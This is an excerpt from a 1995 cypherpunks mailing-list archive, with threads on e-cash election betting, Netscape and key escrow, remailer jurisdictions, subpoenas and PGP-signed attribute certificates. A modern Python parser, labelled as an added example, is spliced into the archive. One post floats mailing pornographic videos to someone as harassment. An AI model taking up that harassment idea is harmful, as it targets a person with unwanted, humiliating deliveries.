[I am posting anonymously, but about a half-dozen of you will know who I am.
Please keep it confidential.
I have posted (anonymously) a while back on this subject, and I am aware of the lame, hard to use college site which does something similar to what I will again suggest.] I would like to see e-cash gambling on US Presidential elections/primaries [as is currently done in London & Moscow]. There was an interesting W$J article that pointed out how the odds in these gambling houses track the results of elections more accurately (from thousands of miles away) than Gallup & Roper ever have, (and without calling me at suppertime). The W$J article appeared right after Clinton's victory over Bush. A web-page in London giving the odds in easy-to-read form would be nice, and might quickly lead to demand for actual gambling from "this side of the pond." This could be accomplished through anonymous remailers & strong crypto. It would accomplish the cypherpunk goals of setting important information free through use of our technology, it would encourage gamblers to learn about strong crypto, and it would use crypto for something besides child porn or drugs, which will be good PR for us. There will, of course, be lame arguments about this "demeaning the integrity of the process," but I think Letterman and Leno could be trusted to handle them without our help. ;) From anonymous at freezone.remailer Thu Nov 30 08:23:23 1995 From: anonymous at freezone.remailer (anonymous at freezone.remailer) Date: Fri, 1 Dec 1995 00:23:23 +0800 Subject: No Subject Message-ID: <199511300354.WAA10417@light.lightlink.com> > And I would ask whoever DID post the PGP key under my name, to please > issue a revocation certificate. > > > Alice de 'nonymous ... > > ...just another one of those... > > > P.S. This post is in the public domain. > C. S. U. M. O. C. L. U. N. E. > > Pretender. I'm the real no-pgp Alice. Alice de 'nonymous ... ...just another one of those... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E. 
From s1113645 at tesla.cc.uottawa.ca Thu Nov 30 08:26:02 1995 From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca) Date: Fri, 1 Dec 1995 00:26:02 +0800 Subject: [Rant!] Death by praise Re: Netscape gives in to key escrow In-Reply-To: Message-ID: On Thu, 30 Nov 1995, Jay Holovacs wrote: > On Thu, 30 Nov 1995, Timothy C. May wrote: > > Can Netscape continue to prosper? This latest issue won't kill it, > > I suspect this will unfortunately help. Stockholders are interested in > profits, not principles. Co-oping with the feds will help Netscape get to > the commercial market sooner, and most customers, sadly don't give a damn > about privacy (or don't understand). Clipper and family are vampires; shine some light on them and they're dead. Witness the public ridicule of the FBI 1% scheme. Compare that to the near mainstream silence about DT. The last round of Clipper was wonderful, for a while in '94 we had Time sounding like Brock Meeks. If Jim Clark really does mean this nonsense then I hope he does a Dorothy Denning and takes his show on the road (sorry Jeff). This is simply easy fodder for journalists without a story, totally black and white cheap shot at the gov. While people don't give a damn about their privacy, they sure do get mad when they're shown how easy it is to take away. They *hate* hearing the $ cost. Maybe some of the people on this list with higher profiles than myself should start defending Clipper and GAK as loudly and stupidly as possible. I've grown dead tired of trying to get anyone around me interested in pgp, remailers and whatnot. Reverse psycho sounds a lot easier: "Noted counterterrorism expert Timothy May was quoted on Connie Chung Live last night as saying "Clipper, GAK and CTHULHU666 are a hundred billion dollar investment in your national security. 
Only through complete wiretapping will we save our nation's children
from violent cigarette smokers, tax cheaters, unlicensed pit-bull owners,
Tax 'n Spend Liberals, murderous Nation of Islam Dope Pushers, audiophiles,
christians, fat people, OJ and jaywalkers on the infohighway."
                                                             -USA Today"

(Apologies. You may now killfile me with a clear conscience.)

If you can't beat 'em, subvert 'em.

From pati at ipied.tu.ac.th Thu Nov 30 08:30:56 1995
From: pati at ipied.tu.ac.th (Patiwat Panurach)
Date: Fri, 1 Dec 1995 00:30:56 +0800
Subject: VisaCash security.
In-Reply-To: <9511300318.AA02710@zorch.w3.org>
Message-ID:

I have read that Visa intends to begin a digital cash system, using both
discardable and rechargeable cards that would implement secure cash
transactions. The system is now in use in Australia, and there are plans
for use during the Olympic Games at Atlanta and a pilot project in Thailand.

Does anybody know if this is truly "cash"? Is it traceable, and what
encryption does it use?

------------------------------------------------------------------------------
Patiwat Panurach               Whatever you can do, or dream you can, begin it.
eMAIL: pati at ipied.tu.ac.th  Boldness has genius, power and magic in it.
m/18 junior Fac of Economics                              -Johann W.Von Goethe

From trei at process.com Thu Nov 30 08:31:30 1995
From: trei at process.com (Peter Trei)
Date: Fri, 1 Dec 1995 00:31:30 +0800
Subject: Netscape gives in to key escrow
Message-ID: <9511301611.AA00257@toad.com>

Jeff wrote:
> sameer wrote:
> > http://www.cnet.com/Central/News/govt.html
> > Bad. Very Bad. And I was almost starting to like Netscape.
> Please don't give up on us yet.
[...]
> PS - you won't find a LEF(sic) in the soon to be released SSL Version 3 spec...
> Jeff Weinstein - Electronic Munitions Specialist

I've been trying to figure out the boundary conditions of the speech -
what's the best and worst interpretations that can be placed upon it.
I was not at the show.
Worst: Netscape will put GAK into every server and browser it sells or distributes. Best: Out of context, misinterpreted quote, referring to the Fortezza support in the newest version of SSL. Fortezza (and the earlier, related Tessera) are PCMCIA cards with Clipper chips. Clipper, as we know, *is* escrowed. There's a lot of interest within the USG for using Web-based technologies for distributing information, some of it confidential. With a Fortezza-based laptop and a Fortezza-enabled browser, a government employee would be able to securely obtain text and graphics info while out in the field - for example, a social worker looking up case histories while at a client's home, to choose a fairly uncontroversial example. At a W3C meeting a few months ago, some NSA employees demoed a Tessera enabled Mosaic client and server. Netscape (and other SW companies) would like to sell to the USG - it's a big market. Adding support for USG supported security systems expands that potential market. Jeff, this does not let you or Netscape off of the hook. A *lot* of people are wondering just exactly what Jim was alluding to,. and would like to see a full, in-context quote. speaking only for myself (whatever that is worth :-) Peter Trei trei at process.com From pete at loshin.com Thu Nov 30 08:38:16 1995 From: pete at loshin.com (Pete Loshin) Date: Fri, 1 Dec 1995 00:38:16 +0800 Subject: "Proprietary" internetworking protocols (was RE: The future will be easy to use ) Message-ID: <01BABEAC.2E90BDC0@ploshin.tiac.net> Oops, sorry about the unfortunate juxtaposition of POTP with the SKIP thread. I didn't mean to imply anything more about POTP than that they were around in Boston in case anyone wanted to talk to them. My comments about "proprietary" internetworking protocols related to discussion of Sun's SKIP, not at all to POTP, whose protocol hasn't been published and won't be published if they don't get their patent. 
I was simply observing that Perry's comment:

  "...an internetworking protocol [e.g. SKIP] used by only
   one vendor gets nowhere."

is not necessarily true, and pointed to SSL and NFS as
counter-examples.

-pl

Phill wrote:

>Both Netscape and Sun had a product that had a large number of seats. From what I
>have seen the POTP have diddly squat in the way of seats.
>
>Looking at the market today it is clear that there are fewer opportunities to do that
>type of roll out. Netscape and Sun were running just ahead of a market. Today I
>don't see how many people will want to abandon PGP for a product that is
>indistinguishable from smoke 'n mirrors.
>
> Phill

From jamesd at echeque.com Thu Nov 30 08:46:17 1995
From: jamesd at echeque.com (James A. Donald)
Date: Fri, 1 Dec 1995 00:46:17 +0800
Subject: The future will be easy to use
Message-ID: <199511301622.IAA08684@blob.best.net>

>Jon Lasser writes:
>> However, if you have optional linking of ID and name, shippers will only
>> ship to keys with such attributes. Because just ID and address, it could
>> be a "hit and run" type attack shipped to a safe maildrop.

At 03:19 AM 11/30/95 -0500, Futplex wrote:
>People who steal credit cards prefer to order goods to be delivered somewhere
>they can grab them.

Presumably all of us seek an ecash and echeque system somewhat better
than a human readable sixteen decimal digit number: Indeed, what
I had in mind was 1024 binary bit number -- we should be working to
a world in which a self generated secret PGP key performs the functions
that a credit card number does today.

(Often this is just the front of the rightful owner's
>home, while Holly the Homeowner is off at work.) But that's just another
>reason to cut down unauthorized credit card charges, not a reason to restrict
>what a rightful cardholder can do with the card. I _want_ to be able to have
>stuff delivered to arbitrary locations, and I _don't_ want to give that up
>just to make it tough on thieves.
> >James Donald writes: >> This argument makes no sense at all: I am going to attack my >> enemies by paying people to send books, computers, and stuff >> to them? > >Ordering hardcore porno videos to be sent to, say, somewhere in Tennessee >might work pretty well in our sadly repressed society. > >-Futplex > > --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From jamesd at echeque.com Thu Nov 30 08:51:07 1995 From: jamesd at echeque.com (James A. Donald) Date: Fri, 1 Dec 1995 00:51:07 +0800 Subject: The future will be easy to use Message-ID: <199511301622.IAA08718@blob.best.net> From: Rich Salz > > There is, of course, no way to interpret the semantics of this electronically. At 10:11 AM 11/30/95 EST, Carl Ellison wrote: > Of course not. In the end, a human needs to make the decision based on > ASCII text. For those ascii texts that belong to a small and commonly used set, we can set our computers to automatically follow certain policies, and to bring to our attention "special case" texts that lie outside this set. --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From BRUEN at mitlns.mit.edu Thu Nov 30 08:52:01 1995 From: BRUEN at mitlns.mit.edu (Bob Bruen, MIT Lab for Nuclear Science) Date: Fri, 1 Dec 1995 00:52:01 +0800 Subject: cypherpunks at ietf Message-ID: <951130112515.44600c48@mitlns.mit.edu> I thought the following mail might be of interest. It's not my doing. 
Bob
=========================================================================
From: SMTP%"MEYERUSA at aol.com" 30-NOV-1995 10:25:39.59
To: BRUEN
CC:
Subj: Re: DISCUSSION FOR IETF DALLAS

Date: Thu, 30 Nov 1995 08:49:15 -0500
Sender:ietf-request at IETF.CNRI.Reston.VA.US
From: MEYERUSA at aol.com
Message-ID: <951130084914_120843907 at mail06.mail.aol.com>
To: rgm3 at is.chrysler.com
cc: ietf at CNRI.Reston.VA.US, SteveCase at aol.com
Subject: Re: DISCUSSION FOR IETF DALLAS

THE WWW MUST BE CONSUMER FRIENDLY IF IT IS TO SURVIVE. THE AVERAGE CONSUMER
THRU A PC, OR A "DEDICATED WEB TERMINAL ON TOP OF THEIR TV SET", MUST BE
ABLE TO USE THE WEB IN THE FUTURE TO:

1. SEARCH FOR CONSUMER GOODS; ORDER CONSUMER GOODS.
2. USE THE WEB FOR TELEPHONE COMMUNICATIONS AND E-MAIL
3. DOWNLOAD TIME SHIFT AUDIO & VIDEO
4. DOWNLOAD MOVIES, SOFTWARE, AND P.P.V. EVENTS
5. HOOK ON-LINE TO VIDEO & AUDIO

THE WWW AND THE ON-LINE SERVICES MUST BE ABLE TO DIAL OUT TO THE CONSUMER
ALSO.

OUR BIGGEST FUTURE PROBLEM IS THAT WE CAN NOT LET BILL GATES, NOR THE
TELEPHONE COMPANIES, NOR THE CABLE TV COMPANIES, NOR THE MADISON AVENUE
ADVERTISING AGENCIES GET CONTROL OF THE WWW.

OUR CURRENT PROBLEM IS THAT THE AVERAGE CONSUMER CAN NOT COMPLETE AN
ACCURATE SEARCH ON THE WEB. COMPANIES MUST BE ABLE TO PROTECT THEIR
TRADEMARKS AND SERVICE MARKS, AND TO EMBED EVERY POSSIBLE KEYWORD IN THEIR
SITE SO THAT IN THE FUTURE A CONSUMER COULD ENTER AT THE SEARCH LINE:
"SHOW ALL DEALERS IN BALTIMORE THAT SELL CHRYSLER MINI-VANS" AND AN
ACCURATE SEARCH OF THE WEB WILL BE RETURNED.

AT THIS POINT SO MANY CYBERPUNKS HAVE EMBEDDED SO MUCH GARBAGE ON THE WEB,
THAT YOU CAN NOT COMPLETE AN ACCURATE SEARCH.

OUR COMPANY HAS BEEN ASKED BY THE NEW YORK AUTO SHOW TO CREATE THE MOST
HIGHTECH VIRTUAL REALITY MOTION SIMULATOR THEATRE FOR THE 1996 NEW YORK
AUTO SHOW. DURING OUR RESEARCH, WE ENTERED "NEW YORK AUTO SHOW" IN OUR WEB
CRAWLER (AMERICA ON-LINE). YOU COULD NOT BELIEVE ALL OF THE GARBAGE THAT
WAS RETURNED FROM OUR SEARCH.
ADDITIONALLY FOR EXAMPLE, IF ON AMERICA ON-LINE YOU NEED TO SEND AN E-MAIL TO DONALD TRUMP OR TO AOL'S STEVE CASE, WHEN YOU SEARCH THE AOL MEMBER DATABASE, WHO IS THE REAL DONALD TRUMP OR THE REAL STEVE CASE. IN SUMMARY, WHAT NEEDS TO BE DISCUSSED AT IETF IN DALLAS NEXT WEEK IS A STANDARD THAT PROTECTS TRADEMARKS AND SERVICE MARKS, AND ALSO A POLICING AGENCY THAT WILL DETERMINE THAT DONALD TRUMP IS AT DONALD TRUMP@, CHRYSLER IS AT CHRYSLERY@ BILL GATES IS AT BILL GATES@, ETC. BUT MORE IMPORTANT, WE NEED TO CLEANUP THE TRASH THAT THE CYBER-PUNKS ARE PLACING ON THE WEB. ED MEYER From sameer at c2.org Thu Nov 30 08:53:51 1995 From: sameer at c2.org (sameer) Date: Fri, 1 Dec 1995 00:53:51 +0800 Subject: Netscape gives in to key escrow In-Reply-To: <30BD716E.5F69@netscape.com> Message-ID: <199511301616.IAA18452@infinity.c2.org> Can we get the text of the actual speech? Unless Netscape officially issues a statement on their home page, and as a press release, saying that the press coverage was wrong and Netscape is *against* any and all forms of GAK, then I think we should assume that Netscape official position is in favor of GAK, and speak out about it as such. It is very damn close to the wire. Even though the speech may have been misreported, it is the reporting that affects public opinion. Even if Netscape has no current products or plans to release products implementing GAK, in light of this press coverage, unless they issue a statement saying they are against GAK, then they are for GAK. I haven't given up on Netscape, yet-- I'm waiting for an official word. Jeff: If Netscape comes out in favor of GAK, will you leave? (Wait until February, at least, of course..) You don't have to answer that to me, or the list, just think about it, and answer it for yourself. Do you think "anyone else" there would leave, as you say below that they don't want to go down history, etc... > > sameer wrote: > > > > http://www.cnet.com/Central/News/govt.html > > > > Bad. Very Bad. 
And I was almost starting to like Netscape. > > Please don't give up on us yet. All press accounts I've read so far > have lots of stuff attributed to Jim, but very little of it is actual > quotes. There appears to be lots of paraphrasing and interpretation > being done on the part of the reporters. The impression that I'm > getting is that the press has blown a couple of small sound bites > way out of proportion. The infoworld article that covers the same > speech only devotes about 20% of the article to the key escrow topic, > and is similarly devoid of actual quotes. > > I have not spoken to Jim about this, and I did not hear the talk > myself, so I'm mostly reading between the lines here. After I saw the > story earlier today I started asking around to see if the company > had made any major policy shift in the direction of GAK, and wasn't > able to turn up anything. If anything its the opposite. > > My feelings about key escrow, which were echo'd by several folks > in management when I spoke to them today are: > > o Government mandated escrow would be a bad thing > o There are some settings where escrow is good, in the corporate > setting, or as a matter of person choice(to protect against > loss of password) > o The whole issue of escrow should be de-coupled from the > export issue > > I don't want to go down in history as a facilitator of the totalitarian > state, and I don't think anyone else here does either. I hope folks > wait for press releases, product announcements, etc. before condemning us > too much. Jim has made comments in the past that were quoted out of > context, and blown way out of proportion to the point that some people > believed that we were monitoring our user's every keystroke and sending > it all back to the home office to generate huge demographic databases. > I suspect that this is the same sort of thing, and I hope everyone will > judge us by what we do. 
>
> --Jeff
>
> PS - you won't find a LEF in the soon to be released SSL Version 3 spec...
>
> --
> Jeff Weinstein - Electronic Munitions Specialist
> Netscape Communication Corporation
> jsw at netscape.com - http://home.netscape.com/people/jsw
> Any opinions expressed above are mine.
>

--
sameer                                     Voice: 510-601-9777
Community ConneXion                        FAX: 510-601-9734
The Internet Privacy Provider              Dialin: 510-658-6376
http://www.c2.org/ (or login as "guest")   sameer at c2.org

From sameer at c2.org Thu Nov 30 08:54:27 1995
From: sameer at c2.org (sameer)
Date: Fri, 1 Dec 1995 00:54:27 +0800
Subject: Credit card theft Re: The future will be easy to use
In-Reply-To:
Message-ID: <199511301606.IAA17493@infinity.c2.org>

> Or c2.org, which might then make things interesting if the theft is detected.
> (in a very perverse, and tooth-gnashingly aggravating way, of course).
> Would Sameer cooperate with the LEAs to catch "an anonymous suspect using
> his service"?

Community ConneXion will comply with all properly formed court orders and subpoenas. We will *not* cooperate without court intervention. (I.e. Mr. FBI calls up and says "can you help us find this suspect"? I respond "got a subpoena?")

--
sameer                                     Voice: 510-601-9777
Community ConneXion                        FAX: 510-601-9734
The Internet Privacy Provider              Dialin: 510-658-6376
http://www.c2.org/ (or login as "guest")   sameer at c2.org

From cme at TIS.COM Thu Nov 30 09:01:49 1995
From: cme at TIS.COM (Carl Ellison)
Date: Fri, 1 Dec 1995 01:01:49 +0800
Subject: Attribute-testimony example (was Re: The future will be easy to use)
In-Reply-To: <199511301622.IAA08718@blob.best.net>
Message-ID: <9511301638.AA05094@tis.com>

-----BEGIN PGP SIGNED MESSAGE-----

>Date: Wed, 29 Nov 1995 08:20:46 -0800
>From: "James A. Donald"
>
>From: Rich Salz
>> > There is, of course, no way to interpret the semantics of this
>> > electronically.
>
>At 10:11 AM 11/30/95 EST, Carl Ellison wrote:
>> Of course not. In the end, a human needs to make the decision based on
>> ASCII text.
>
>For those ascii texts that belong to a small and commonly used set,
>we can set our computers to automatically follow certain policies,
>and to bring to our attention "special case" texts that lie outside
>this set.

Exactly!

We haven't yet learned that small and commonly used set -- understandably, since the field is so new. I'd be willing to bet that association between a key and a checking account would be on the list. Beyond that, I don't know.

Once an element of that set is identified, it can be assigned a codeword (to make parsing easier).

For example, a general certificate might be:

- -----BEGIN PGP SIGNED MESSAGE-----
Signing-Key-ID: f149b8e7e1f71e60964fff361dae2460
Signed-Key-ID: 76c68cb46a8e3de1509acaf4170feb10
Meaning: I have met this person, introduced to me as James, who signed with that key and I found him to be about 25 years old, roughly 5'11" and with dark hair. Beyond that I don't remember much.
- -----BEGIN PGP SIGNATURE-----
[...] signature with the signing key
- -----END PGP SIGNATURE-----

While the specialized one might be:

- -----BEGIN PGP SIGNED MESSAGE-----
Signing-Key-ID: bc2cb00144f223498fcc074eabb821d0
Signed-Key-ID: e05c601c4ec4af3aeb54a53171ed65da
Meaning: checking-account: 116 94265, First Security Bank
- -----BEGIN PGP SIGNATURE-----
[...] signature with First Security Bank's key
- -----END PGP SIGNATURE-----

This format has several advantages over ASN.1, of course, but I won't belabor that point here.

 - Carl

+--------------------------------------------------------------------------+
|Carl M. Ellison cme at tis.com http://www.clark.net/pub/cme |
|Trusted Information Systems, Inc. http://www.tis.com/ |
|3060 Washington Road PGP 2.6.2: 61E2DE7FCB9D7984E9C8048BA63221A2|
|Glenwood MD 21738 Tel:(301)854-6889 FAX:(301)854-5363 |
+--------------------------------------------------------------------------+

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBML3ddFQXJENzYr45AQFxVQP/StUBo3fx4K97pv36af+2V40GUEGJircj
lNWZXeZAlsU/i+wdEzzRF3nWQ/H6wZjJgQDVNlox74CsMJp6T1YLDvbJ6/EAMG9M
kFIp6X2xkgnlZcH/4WsKqBDwTmF0kR0qoPWJY+7w5mtCrKNfsfN9JMaD4xdhueaM
U323z50t7ck=
=CxNl
-----END PGP SIGNATURE-----

From s1113645 at tesla.cc.uottawa.ca Thu Nov 30 09:02:52 1995
From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca)
Date: Fri, 1 Dec 1995 01:02:52 +0800
Subject: e-cash gambling
In-Reply-To: <199511301536.QAA25670@utopia.hacktic.nl>
Message-ID:

On Thu, 30 Nov 1995, Anonymous wrote:

> I would like to see e-cash gambling on US Presidential elections/primaries
> [as is currently done in London & Moscow]. There was an interesting W$J
> article that pointed out how the odds in these gambling houses track the
> results of elections more accurately (from thousands of miles away) than
> Gallup & Roper ever have, (and without calling me at suppertime).

The Idea Futures. (This has already been mentioned in this thread) There is an outfit calling itself Ideosphere that is planning a commercial version of an Idea Futures. It is certainly fairer than online roulette. You might want to try the game out yourself. Dr. Froomkin has a link to it on his homepage (I think).

> It would accomplish the cypherpunk goals of setting important information
> free through use of our technology, it would encourage gamblers to learn
> about strong crypto, and it would use crypto for something besides child
> porn or drugs, which will be good PR for us. There will, of course, be

Incidentally there are a lot of crypto related claims being played (which is natural considering the number of cpunks in the game).
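An added example, not code from Carl Ellison or anyone else on the list: a sketch of the processing described in the "Attribute-testimony example" message above, where statements whose Meaning starts with a known codeword are handled by policy and everything else is handed to a human. The line layout of the sample, the trusted-issuer table and all function names are assumptions, and the PGP signatures are assumed to have been verified by PGP beforehand.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set

# One statement: signed body, then the signature block (not verified here).
STATEMENT = re.compile(
    r"-----BEGIN PGP SIGNED MESSAGE-----\n(.*?)\n"
    r"-----BEGIN PGP SIGNATURE-----\n.*?-----END PGP SIGNATURE-----", re.S)
KEY_ID = re.compile(r"[0-9a-f]{32}")
CODEWORD = re.compile(r"([a-z][a-z0-9-]*):\s*(.+)")

# Constructed sample: the two statements from the message, dash-escaped as
# they appear there; the line breaks are a reconstruction.
SAMPLE = """\
- -----BEGIN PGP SIGNED MESSAGE-----
Signing-Key-ID: f149b8e7e1f71e60964fff361dae2460
Signed-Key-ID: 76c68cb46a8e3de1509acaf4170feb10
Meaning: I have met this person, introduced to me as James, who signed
with that key and I found him to be about 25 years old, roughly 5'11"
and with dark hair. Beyond that I don't remember much.
- -----BEGIN PGP SIGNATURE-----
[...] signature with the signing key
- -----END PGP SIGNATURE-----

- -----BEGIN PGP SIGNED MESSAGE-----
Signing-Key-ID: bc2cb00144f223498fcc074eabb821d0
Signed-Key-ID: e05c601c4ec4af3aeb54a53171ed65da
Meaning: checking-account: 116 94265, First Security Bank
- -----BEGIN PGP SIGNATURE-----
[...] signature with First Security Bank's key
- -----END PGP SIGNATURE-----
"""


@dataclass
class Statement:
    signing_key: str
    signed_key: Optional[str]
    meaning: str


@dataclass
class Decision:
    action: str                      # "auto" or "review"
    codeword: Optional[str] = None
    fields: Dict[str, str] = field(default_factory=dict)
    reason: str = ""


def dash_unescape(text: str) -> str:
    """Undo PGP clearsign dash-escaping: '- -----BEGIN' -> '-----BEGIN'."""
    return "\n".join(l[2:] if l.startswith("- ") else l
                     for l in text.splitlines())


def parse_statements(text: str) -> List[Statement]:
    """Extract every well-formed attribute statement from a message body."""
    out = []
    for m in STATEMENT.finditer(dash_unescape(text)):
        parts = re.split(r"^Meaning:", m.group(1), maxsplit=1, flags=re.M)
        if len(parts) != 2:
            continue                 # no Meaning field: not this format
        hdr = dict(l.split(":", 1) for l in parts[0].splitlines() if ":" in l)
        signing = hdr.get("Signing-Key-ID", "").strip()
        signed = hdr.get("Signed-Key-ID", "").strip() or None
        if not KEY_ID.fullmatch(signing):
            continue                 # malformed signer key id
        if signed is not None and not KEY_ID.fullmatch(signed):
            continue                 # malformed subject key id
        out.append(Statement(signing, signed, " ".join(parts[1].split())))
    return out


def parse_checking_account(value: str) -> Dict[str, str]:
    """Value format taken from the message: '<account number>, <bank>'."""
    number, _, bank = value.partition(",")
    if not re.fullmatch(r"[0-9][0-9 ]*", number.strip()) or not bank.strip():
        raise ValueError("malformed checking-account value")
    return {"account": number.strip(), "bank": bank.strip()}


# Registry of the "small and commonly used set" (only one entry is known).
HANDLERS = {"checking-account": parse_checking_account}


def evaluate(stmt: Statement, trusted: Dict[str, Set[str]]) -> Decision:
    """Apply automatic policy to codeword statements; flag the rest."""
    m = CODEWORD.fullmatch(stmt.meaning)
    if m is None or m.group(1) not in HANDLERS:
        return Decision("review", reason="free text or unknown codeword")
    codeword, value = m.groups()
    if stmt.signing_key not in trusted.get(codeword, set()):
        return Decision("review", codeword, reason="issuer not trusted")
    if stmt.signed_key is None:
        return Decision("review", codeword, reason="no Signed-Key-ID")
    try:
        return Decision("auto", codeword, HANDLERS[codeword](value))
    except ValueError as exc:
        return Decision("review", codeword, reason=str(exc))


if __name__ == "__main__":
    # Assumption: the reader has decided to trust this key as a bank key.
    banks = {"checking-account": {"bc2cb00144f223498fcc074eabb821d0"}}
    for s in parse_statements(SAMPLE):
        print(s.signed_key, evaluate(s, banks))
```

The free-text statement about "James" comes back as a review item, while the bank's statement is accepted automatically only because its signer is listed as a trusted issuer for that codeword.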
From sameer at c2.org Thu Nov 30 09:42:15 1995
From: sameer at c2.org (sameer)
Date: Fri, 1 Dec 1995 01:42:15 +0800
Subject: "Got a subpoena?"
In-Reply-To:
Message-ID: <199511301704.JAA23295@infinity.c2.org>

> "finessing" laws will become more important. In short, they WILL have
> a subpoena--then what?

Then they'll find out that I don't have any information that could help them, anyway.

--
sameer                                     Voice: 510-601-9777
Community ConneXion                        FAX: 510-601-9734
The Internet Privacy Provider              Dialin: 510-658-6376
http://www.c2.org/ (or login as "guest")   sameer at c2.org

From pete at loshin.com Thu Nov 30 09:46:35 1995
From: pete at loshin.com (Pete Loshin)
Date: Fri, 1 Dec 1995 01:46:35 +0800
Subject: "Proprietary" internetworking protocols (was RE: The future will be easy to use )
Message-ID: <01BABF1F.0246DD80@ploshin.tiac.net>

Perry wrote:
>Pete Loshin writes:
>> I was simply observing that Perry's comment:
>>
>> "...an internetworking protocol [e.g. SKIP] used by only
>> one vendor gets nowhere."
>>
>> is not necessarily true, and pointed to SSL and NFS as
>> counter-examples.
>
>I disagree.
>
>First of all, NFS was not competing with other widely available
>standards. Neither was SSL, for that matter.

But it seems like every vendor who's written an S-HTTP browser/server is adding SSL for version 1.1.

>Second of all, other vendors are committed to developing the other
>standard.
>
>What good will it be to run SKIP when your Cisco router wants to talk
>to you with something else?

None, of course, just as rsh doesn't help me connect to a telnet server. My comment wasn't on the wisdom of SKIP, but rather on the specific statement Perry made about single vendors being able to drive certain protocols on their own (e.g., SSL and others).

More interesting from the historical view (but lacking in crypto significance so I'll refrain from further posting on the topic) is the question of what other protocols have been put forth by single vendors and gained major market share.
-pl

From KJC at cityscape.co.uk Thu Nov 30 10:10:16 1995
From: KJC at cityscape.co.uk (KJC)
Date: Fri, 1 Dec 1995 02:10:16 +0800
Subject: [Rant!] Death by praise Re: Netscape gives in to key escrow
Message-ID: <199511301736.RAA29417@ns.cityscape.co.uk>

>
>
>On Thu, 30 Nov 1995, Jay Holovacs wrote:
>
>> On Thu, 30 Nov 1995, Timothy C. May wrote:
>> > Can Netscape continue to prosper? This latest issue won't kill it,
>>
>> I suspect this will unfortunately help. Stockholders are interested in
>> profits, not principles. Co-oping with the feds will help Netscape get to
>> the commercial market sooner, and most customers, sadly don't give a damn
>> about privacy (or don't understand).
>
>
>Clipper and family are vampires; shine some light on them and they're dead.
>Witness the public ridicule of the FBI 1% scheme. Compare that to the near
>mainstream silence about DT. The last round of Clipper was wonderful, for
>a while in '94 we had Time sounding like Brock Meeks.
>
>If Jim Clark really does mean this nonsense then I hope he does a Dorothy
>Denning and takes his show on the road (sorry Jeff). This is simply
>easy fodder for journalists without a story, totally black and white
>cheap shot at the gov. While people don't give a damn about their privacy,
>they sure do get mad when they're shown how easy it is to take away.
>They *hate* hearing the $ cost.
>
>Maybe some of the people on this list with higher profiles than myself should
>start defending Clipper and GAK as loudly and stupidly as possible. I've
>grown dead tired of trying to get anyone around me interested in pgp,
>remailers and whatnot. Reverse psycho sounds a lot easier:
>
>"Noted counterterrorism expert Timothy May was quoted on Connie Chung Live
>last night as saying "Clipper, GAK and CTHULHU666 are a hundred billion
>dollar investment in your national security. Only through complete wiretapping
>will we save our nation's children from violent cigarette smokers, tax
>cheaters, unlicensed pit-bull owners, Tax 'n Spend Liberals, murderous Nation
>of Islam Dope Pushers, audiophiles, christians, fat people, OJ and
>jaywalkers on the infohighway." -USA Today"
>
>(Apologies. You may now killfile me with a clear conscience.)
>
>If you can't beat 'em, subvert 'em.
>
>
>

As a _very_ low profile member of this list I thought a futile gesture was needed at this point:

*I agree with you*

I've been trying to interest the BBC in the U.K. in pgp, clipper et al for ages - I give up!.- BTW- after 'Britland' MPs posted here a while back I thought _maybe_ we'd hear more. Will the last one to leave Grate Britain please switch out the lights!

kc
------------------------------------------------------
Fingerprint:OF 3B IE 6A 8D 14 EC 9B 75 9B FB A2 E8 35 FE
Finger: .plan + public key -> af91 at ftp.cityscape.co.uk
http://www.gold.net/users/af91/kjc.htm
"...and now...five in a row by Whitney Houston"
------------------------------------------------------

From anonymous-remailer at shell.portal.com Thu Nov 30 10:12:57 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Fri, 1 Dec 1995 02:12:57 +0800
Subject: List of reliable remailers
Message-ID: <199511301739.JAA13160@jobe.shell.portal.com>

-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 21 Nov 1995, Raph Levien wrote:

> Groups of remailers sharing a machine or operator:
> (robo syrinx c2)
> (flame hacktic replay)
> (alumni portal)

Anything more specific on the above info?

robo, syrinx, c2 all running on c2.org
alumni, portal run by Hal Finney
hacktic, replay run on xs4all / by Alex de Joode?

ok so far, but flame is xs4all/de Joode as well?

flame used to be:

Slovenian Anonymous Remailer

Does the fact that it is now listed along with hacktic and replay now imply that it is no longer / never was in Slovenia?
The reason for asking is that jurisdictions are interesting properties for remailers. The more jurisdictions available the better the legal morass can be created by remailing through 101 different jurisdictions.

Speaking of which, these new additions:

ford ecafe

are welcome additions both being in Europe (Germany, and UK respectively)

Any other European/Australasian cypherpunks care to add a remailer in their jurisdiction?

Alice de 'nonymous ...

[just giving the acquired nym a work out, and I wanted to ask the Q anyway, so I thought I may as well flesh this Nym out, and give it a better rep than the impostor who refuses to sign posts :-) Again, anything that isn't signed isn't from me.]

...just another one of those...

P.S. This post is in the public domain.
C. S. U. M. O. C. L. U. N. E.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBML3jzIbu8OQjKS7RAQFIQQP/ShGx18pfAT0TZcsAaY0T/LRuaXkE+C+k
9lL6mXo/FY1bHDXFUsNkb4wjJx6RujyMRWL6eI7T/ph531CY2wYaBzVdMXHjPy8m
kCMSZai08WlLJboe06tlZCGHvpDEqGPATZd1VZoulFSD1F9Ughhidspvp9/jqIR8
q/cZbGkWSrY=
=vvNf
-----END PGP SIGNATURE-----

From anon-remailer at utopia.hacktic.nl Thu Nov 30 10:21:52 1995
From: anon-remailer at utopia.hacktic.nl (Name Withheld by Request)
Date: Fri, 1 Dec 1995 02:21:52 +0800
Subject: Spam the Sign II
Message-ID: <199511301740.SAA29245@utopia.hacktic.nl>

Looks like Spam the Sign I was a little premature.

From jlasser at rwd.goucher.edu Thu Nov 30 10:23:17 1995
From: jlasser at rwd.goucher.edu (Jon Lasser)
Date: Fri, 1 Dec 1995 02:23:17 +0800
Subject: The future will be easy to use
